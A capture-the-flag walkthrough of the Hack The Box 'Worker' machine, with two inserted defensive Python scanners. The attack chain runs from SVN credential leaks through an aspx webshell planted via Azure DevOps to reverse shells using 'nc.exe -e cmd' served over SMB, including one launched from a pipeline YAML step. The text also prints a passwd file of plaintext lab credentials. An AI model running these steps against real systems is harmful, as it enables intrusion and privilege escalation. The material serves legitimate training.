Worker

Enumeration
As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.
The following nmap command scans the target machine for open ports quickly and saves the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.203 -oN allPorts
-sS
use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000
nmap will try to keep the sending rate at or above 5000 packets per second.
-p-
scan the entire port range, from 1 to 65535.
-T5
insane mode, the fastest of the nmap timing templates.
-Pn
assume the host is online.
-n
scan without reverse DNS resolution.
-oN
save the scan result into a file, in this case the allPorts file.
# Nmap 7.92 scan initiated Sun Jul 3 15:38:10 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.203
Nmap scan report for 10.10.10.203
Host is up (0.067s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3690/tcp open svn
5985/tcp open wsman
# Nmap done at Sun Jul 3 15:38:36 2022 -- 1 IP address (1 host up) scanned in 26.52 seconds
Now that we know which ports are open, let's identify the services and versions running on them. The following command scans these ports in more depth and saves the result into a file:
nmap -sC -sV -p80,3690,5985 10.10.10.203 -oN targeted
-sC
perform the scan using the default set of scripts.
-sV
enable version detection.
-oN
save the scan result into a file, in this case the targeted file.
# Nmap 7.92 scan initiated Sun Jul 3 15:38:59 2022 as: nmap -sCV -p80,3690,5985 -oN targeted 10.10.10.203
Nmap scan report for worker.htb (10.10.10.203)
Host is up (0.083s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 3 15:39:08 2022 -- 1 IP address (1 host up) scanned in 9.48 seconds
Port 80 (HTTP), which probably serves a website, port 3690 (Subversion) and port 5985 (WinRM) are open. If we take a look at the website, we'll see the default IIS page.

As we saw in the nmap report, port 3690 is open, so we could try to enumerate the Subversion server with the following command.
svn ls svn://10.10.10.203
dimension.worker.htb/
moved.txt
There is some content in it. Let's download the content of the Subversion server.
svn checkout svn://10.10.10.203
A dimension.worker.htb
A dimension.worker.htb/LICENSE.txt
A dimension.worker.htb/README.txt
A dimension.worker.htb/assets
A dimension.worker.htb/assets/css
A dimension.worker.htb/assets/css/fontawesome-all.min.css
A dimension.worker.htb/assets/css/main.css
A dimension.worker.htb/assets/css/noscript.css
A dimension.worker.htb/assets/js
A dimension.worker.htb/assets/js/breakpoints.min.js
A dimension.worker.htb/assets/js/browser.min.js
A dimension.worker.htb/assets/js/jquery.min.js
A dimension.worker.htb/assets/js/main.js
A dimension.worker.htb/assets/js/util.js
A dimension.worker.htb/assets/sass
A dimension.worker.htb/assets/sass/base
A dimension.worker.htb/assets/sass/base/_page.scss
A dimension.worker.htb/assets/sass/base/_reset.scss
A dimension.worker.htb/assets/sass/base/_typography.scss
A dimension.worker.htb/assets/sass/components
A dimension.worker.htb/assets/sass/components/_actions.scss
A dimension.worker.htb/assets/sass/components/_box.scss
A dimension.worker.htb/assets/sass/components/_button.scss
A dimension.worker.htb/assets/sass/components/_form.scss
A dimension.worker.htb/assets/sass/components/_icon.scss
A dimension.worker.htb/assets/sass/components/_icons.scss
A dimension.worker.htb/assets/sass/components/_image.scss
A dimension.worker.htb/assets/sass/components/_list.scss
A dimension.worker.htb/assets/sass/components/_table.scss
A dimension.worker.htb/assets/sass/layout
A dimension.worker.htb/assets/sass/layout/_bg.scss
A dimension.worker.htb/assets/sass/layout/_footer.scss
A dimension.worker.htb/assets/sass/layout/_header.scss
A dimension.worker.htb/assets/sass/layout/_main.scss
A dimension.worker.htb/assets/sass/layout/_wrapper.scss
A dimension.worker.htb/assets/sass/libs
A dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A dimension.worker.htb/assets/sass/libs/_functions.scss
A dimension.worker.htb/assets/sass/libs/_mixins.scss
A dimension.worker.htb/assets/sass/libs/_vars.scss
A dimension.worker.htb/assets/sass/libs/_vendor.scss
A dimension.worker.htb/assets/sass/main.scss
A dimension.worker.htb/assets/sass/noscript.scss
A dimension.worker.htb/assets/webfonts
A dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A dimension.worker.htb/images
A dimension.worker.htb/images/bg.jpg
A dimension.worker.htb/images/overlay.png
A dimension.worker.htb/images/pic01.jpg
A dimension.worker.htb/images/pic02.jpg
A dimension.worker.htb/images/pic03.jpg
A dimension.worker.htb/index.html
A moved.txt
Checked out revision 5.
If we look in our current directory, we'll see the dimension.worker.htb directory and the moved.txt file. Let's take a look at that file.
cat moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb
// The Worker team :)
Now that we know a few domain names, let's add them to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.203 worker.htb dimension.worker.htb devops.worker.htb
We could also see the commits that have been made.
svn log svn://10.10.10.203
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 15:52:00 +0200 (Sat, 20 Jun 2020) | 1 line
Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 15:50:20 +0200 (Sat, 20 Jun 2020) | 1 line
Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 15:46:19 +0200 (Sat, 20 Jun 2020) | 1 line
-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 15:45:16 +0200 (Sat, 20 Jun 2020) | 1 line
Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 15:43:43 +0200 (Sat, 20 Jun 2020) | 1 line
First version
------------------------------------------------------------------------
As we can see, all the commits have been made by the nathen user. Let's see the content of the r2 commit.
svn up -r 2
Updating '.':
D moved.txt
A deploy.ps1
Updated to revision 2.
Now we have the deploy.ps1 file. Let's take a look at it.
cat deploy.ps1
$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
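The script above stores the password as a string literal and only then converts it to a SecureString, so anyone who can read revision 2 of the repository recovers it. The following scanner, added here and not part of the original writeup, flags that idiom in PowerShell files under version control; the sample scripts, their variable names and the placeholder password are constructed.

```python
import re
from collections import namedtuple

Finding = namedtuple("Finding", "line kind variable")

# Idioms from the deployment script above: a string literal, piped into
# ConvertTo-SecureString, then wrapped in a PSCredential.
LITERAL_ASSIGN = re.compile(r'^\s*\$(\w+)\s*=\s*(["\'])(.*?)\2\s*$')
TO_SECURE = re.compile(r'^\s*\$(\w+)\s*=\s*\(?\s*\$(\w+)\s*\|\s*ConvertTo-SecureString\b(.*)$', re.I)
PSCRED = re.compile(r'PSCredential\s*\(?\s*\$(\w+)\s*,\s*\$(\w+)', re.I)

def scan_powershell(script):
    """Flag credentials that are recoverable by anyone who can read the script."""
    literals, secure_from, findings = {}, {}, []
    for lineno, line in enumerate(script.splitlines(), 1):
        m = LITERAL_ASSIGN.match(line)
        if m:                                   # remember every hard-coded string
            literals[m.group(1).lower()] = lineno
            continue
        m = TO_SECURE.match(line)
        if m:
            target, source, flags = m.group(1).lower(), m.group(2).lower(), m.group(3)
            if source in literals:              # SecureString built from a literal: no protection
                secure_from[target] = source
                findings.append(Finding(lineno, "literal-to-securestring", source))
            if "-asplaintext" in flags.lower():
                findings.append(Finding(lineno, "asplaintext-conversion", source))
            continue
        m = PSCRED.search(line)
        if m and (m.group(2).lower() in secure_from or m.group(2).lower() in literals):
            findings.append(Finding(lineno, "credential-from-literal", m.group(2).lower()))
    return findings

# Constructed samples: the shape of deploy.ps1 with placeholder values, and a variant
# that loads a DPAPI-protected secret from a file instead of embedding it.
SAMPLE_LEAKY_PS1 = """\
$user = "svc_deploy"
$plain = "EXAMPLE_PASSWORD"
$pwd = ($plain | ConvertTo-SecureString -AsPlainText -Force)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file Copy-Site.ps1")
"""
SAMPLE_SAFE_PS1 = """\
$user = "svc_deploy"
$pwd = Get-Content deploy.cred | ConvertTo-SecureString
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
"""
```

Run it over every .ps1 in a checkout of each revision, since the page shows the secret living in r2 even after r5 removed the script from the head of the repository.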
Now we have some credentials. Let's take a look at the dimension.worker.htb site, and see if there is any virtual hosting.

Not much going on. Let's take a look now at the devops.worker.htb site.

Let's try to log in with the found credentials.

And we get it.

Exploitation
Let's click on the SmartHotel360 project.

From the Repos section we can see all the subdomains of the worker.htb domain. The idea here is to upload a .aspx webshell, which you can download from here, to one of the subdomain sites, for example alpha.worker.htb. To do it, select the alpha repository and click on Upload file(s).

Then select the cmd.aspx file and hit Commit.

But we get an error because we cannot change the master branch. So let's go back and create a new branch.

Let's call it webshell.

Then, upload the cmd.aspx webshell to the webshell branch.

Then, click on Create a pull request.

And click on Create.

Then, click on Approve.

Now, from the Pipelines section, let's run the Alpha-CI pipeline.

And select the webshell branch.

Finally, the cmd.aspx file is in the master branch, and we can access it from the browser.
http://alpha.worker.htb/cmd.aspx

Time to get a shell. First, let's set up a netcat listener on port 4444.
rlwrap nc -lvnp 4444
-l
listen mode.
-v
verbose mode.
-n
numeric-only IP addresses, no DNS resolution.
-p
specify the port to listen on.
Now, let's set up an SMB server serving the directory where the nc.exe binary is located.
impacket-smbserver smbFolder $(pwd) -smb2support
Finally, if we execute the cmd.exe program with the following parameters from the webshell, we'll get a reverse shell as the iis apppool\defaultapppool user.
c:\windows\system32\cmd.exe
/c \\10.10.14.15\smbFolder\nc.exe -e cmd 10.10.14.15 4444
listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.203] 49865
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
whoami
iis apppool\defaultapppool
Privilege Escalation
Enumerating the system, we could guess that the user flag is inside the robisl home directory.
dir \users
Volume in drive C has no label.
Volume Serial Number is 32D6-9041
Directory of c:\users
2020-07-07 17:53 <DIR> .
2020-07-07 17:53 <DIR> ..
2020-03-28 15:59 <DIR> .NET v4.5
2020-03-28 15:59 <DIR> .NET v4.5 Classic
2020-08-18 00:33 <DIR> Administrator
2020-03-28 15:01 <DIR> Public
2020-07-22 01:11 <DIR> restorer
2020-07-08 19:22 <DIR> robisl
0 File(s) 0 bytes
8 Dir(s) 10 490 904 576 bytes free
At this point, something that we could do is enumerate the logical disks available on the system.
wmic logicaldisk get name
Name
C:
W:
There is the W: logical disk. Let's enumerate it.
dir W:
Volume in drive W is Work
Volume Serial Number is E82A-AEA8
Directory of W:\
2020-06-16 18:59 <DIR> agents
2020-03-28 15:57 <DIR> AzureDevOpsData
2020-04-03 11:31 <DIR> sites
2020-06-20 16:04 <DIR> svnrepos
0 File(s) 0 bytes
4 Dir(s) 18 768 314 368 bytes free
Inside the svnrepos directory, we find the \svnrepos\www\conf\passwd file, which contains a lot of credentials, including those of the nathen and robisl users.
type W:\svnrepos\www\conf\passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
We could try the credentials of the robisl user on the devops.worker.htb website.

Now we see the PartsUnlimited project.

This project only has one repository.

From Project settings > Security we can see that the robisl user is a member of the Build Administrators group, so we can create pipelines.

Let's go to the Pipelines section and create a new pipeline.

Then, select the Azure Repos Git option.

Then, select the PartsUnlimited project.

Now, select the Starter pipeline.

Then, we will configure the YAML file by changing the pool value to Setup, since that is the name of the agent pool.

And then we'll change the script value to a command which will send us a reverse shell.

# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml
trigger:
- master
pool: 'Setup'
steps:
- script: echo Hello, world!
  displayName: 'Run a one-line script'
- script: \\10.10.14.15\smbFolder\nc.exe -e cmd 10.10.14.15 4444
  displayName: 'Run a multi-line script'
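The pipeline above is exactly what a reviewer or a branch policy sees before the run is approved. The following check, added here and not part of the original writeup or of Azure DevOps itself, parses a pipeline YAML without PyYAML and flags a self-hosted pool together with script steps that execute from a UNC share or spawn a netcat-bound shell; the hosted-pool allowlist and the share host in the sample are constructed placeholders.

```python
import re
# Indicators of a step running something fetched from a share or binding a shell to a socket.
UNC_PATH = re.compile(r'\\\\[\w.\-]+\\[\w$.\-]+')             # \\host\share
NETCAT_SHELL = re.compile(r'\bnc(64)?\.exe\b.*\s-e\s', re.I)   # nc.exe ... -e <shell>
POOL_LINE = re.compile(r'^\s*(?:pool|vmImage):\s*[\'"]?([^\'"]+?)[\'"]?\s*$')
STEP_LINE = re.compile(r'^\s*-\s*(script|bash|pwsh|powershell):\s*(.+)$')
HOSTED_POOLS = {"ubuntu-latest", "windows-latest", "macos-latest"}  # constructed allowlist
def _scan_command(lineno, cmd, issues):
    if UNC_PATH.search(cmd):
        issues.append((lineno, "unc-exec", cmd))
    if NETCAT_SHELL.search(cmd):
        issues.append((lineno, "netcat-shell", cmd))
def check_pipeline(yaml_text):
    """Return (pool_name, issues) for an Azure Pipelines YAML document; no PyYAML needed."""
    issues, pool, body_indent = [], None, None
    for lineno, raw in enumerate(yaml_text.splitlines(), 1):
        indent = len(raw) - len(raw.lstrip(" "))
        if body_indent is not None:                  # inside a `script: |` block scalar
            if raw.strip() and indent > body_indent:
                _scan_command(lineno, raw.strip(), issues)
                continue
            body_indent = None
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        m = POOL_LINE.match(raw)
        if m:
            pool = m.group(1)
            if pool.lower() not in HOSTED_POOLS:     # self-hosted agent: scripts run on your host
                issues.append((lineno, "self-hosted-pool", pool))
            continue
        m = STEP_LINE.match(raw)
        if m:
            cmd = m.group(2).strip()
            if cmd in ("|", "|-", ">", ">-"):
                body_indent = m.start(1)             # body lines sit deeper than the key
            else:
                _scan_command(lineno, cmd, issues)
    return pool, issues
# Constructed sample mirroring the pipeline edited above; the share host is a placeholder.
SAMPLE_PIPELINE = """\
trigger:
- master
pool: 'Setup'
steps:
- script: echo Hello, world!
  displayName: 'Run a one-line script'
- script: \\\\10.0.0.5\\smbFolder\\nc.exe -e cmd 10.0.0.5 4444
  displayName: 'Run a multi-line script'
"""
```

The self-hosted-pool finding is the one that matters most here: the Setup pool's agent runs as SYSTEM, so any Build Administrator who can save a pipeline YAML inherits that privilege.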
Make sure the SMB server is still serving the directory where the nc.exe binary is. Then let's set up another netcat listener on port 4444.
rlwrap nc -lvnp 4444
-l
listen mode.
-v
verbose mode.
-n
numeric-only IP addresses, no DNS resolution.
-p
specify the port to listen on.
Then, click on Save and run, select the Create a new branch for this commit and start a pull request option, and click on Save and run again.

Then, after waiting a bit, we'll get a shell as the nt authority\system user. All we have to do then is reap the harvest and take the root flag.
listening on [any] 4444 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.203] 50077
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
nt authority\system
type C:\users\administrator\desktop\root.txt
da8deb09764e1567ed487b8ba21c6703